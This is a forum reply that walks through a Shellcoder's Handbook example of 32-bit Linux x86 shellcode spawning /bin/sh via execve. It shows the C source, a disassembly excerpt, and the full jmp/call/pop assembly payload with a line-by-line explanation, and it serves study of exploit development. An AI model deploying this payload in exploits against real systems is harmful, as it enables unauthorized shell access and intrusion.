Hi again,
I was going to type out an excerpt from The Shellcoder's Handbook, but it is multiple pages long. This was a Good Thing because it forced me to understand it before posting here :-) I haven't done so previously because I'm focusing on the reversing course that I'm doing at the moment.
Anyway, in summary:
We want to spawn a shell by calling (in pseudocode; the second argument is really a null-terminated argv array):
execve ("/bin/sh", {"/bin/sh", NULL}, NULL);
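So first we write what we want to do in C (this is code from the book):
#include <stdio.h>
#include <unistd.h>   /* declares execve */
int main()
{
    char *happy[2];
    happy[0] = "/bin/sh";   /* argv[0]: the program name */
    happy[1] = NULL;        /* argv must end with a null pointer */
    execve (happy[0], happy, NULL);
}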
Next we disassemble it and take a look at the execve call (this is cut down to show the parameters and the call itself, but it's good to look at the entire function):
804e15b: 8b 5d 08 mov 0x8(%ebp),%ebx
<snip>
804e165: 8b 4d 0c mov 0xc(%ebp),%ecx
804e168: 8b 55 10 mov 0x10(%ebp),%edx
804e16b: b8 0b 00 00 00 mov $0xb,%eax
804e170: cd 80 int $0x80
As you can see, int $0x80 performs the syscall whose number is stored in eax (execve is 0xb) and takes three arguments, passed in via the registers ebx, ecx and edx (this is the 32-bit Linux syscall convention).
The problem with simply taking the disassembly and removing null bytes is that there are a lot of hard-coded addresses in there - which, as you've found, are difficult to deal with.
So we need a way to make it so we can reference everything via relative addressing.
The simplest way to do this is the jmp/call/pop trick: we place our data directly after a call instruction, so that the call pushes the data's address onto the stack, where we can pop it into a register. The idea is that we start the shellcode off with a jump to that call and then go from there.
Here's the assembly code from the book (sorry for the Intel syntax):
Section .text
global _start
_start:
jmp short gotocall
shellcode:
pop esi
xor eax, eax
mov byte [esi+7], al
lea ebx, [esi]
mov long [esi +8], ebx
mov long [esi + 12], eax
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi +12]
int 0x80
gotocall:
call shellcode
db '/bin/shABBBBCCCC'
When the call instruction is executed, the address of whatever immediately follows it is pushed onto the stack as the return address. Here that is the address of our db string. We've included some padding in the db (define byte) directive in order to make room for the extra parameters in our call to execve.
Next we pop esi to get the address of our '/bin/shABBBBCCCC' string into the ESI register. Now we can reference everything as offsets from ESI.
xor eax, eax
sets eax to zero (without putting any null bytes in the code itself).
mov byte [esi+7], al
writes a null byte at offset 7 of our string, over the "A", which terminates '/bin/sh'
lea ebx, [esi]
places the address of our string into ebx
mov long [esi +8], ebx
stores that 4-byte address at esi+8, over the "BBBB". Our buffer should now look like '/bin/sh.' followed by the 4-byte address of the string and then 'CCCC', with the "." representing a null
mov long [esi + 12], eax
This moves four null bytes (eax was zeroed previously) over the "CCCC", the last part of our string
Now we set up the registers for the int 0x80:
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi +12]
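At this point, EAX will contain 00 00 00 0b (the execve syscall number)
EBX will contain a pointer to the string '/bin/sh'
ECX will contain a pointer to esi+8, which is our argv array: a pointer to '/bin/sh' followed by a null pointer
And EDX will contain a pointer to that null pointer at esi+12, which serves as an empty envp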
Then we execute the interrupt.
int 0x80
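So you merely have to assemble that code and extract the opcodes. Note that the code writes to its own string, so it needs to run from writable memory (such as the stack); run straight from a read-only .text section it will segfault.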
hope that helps -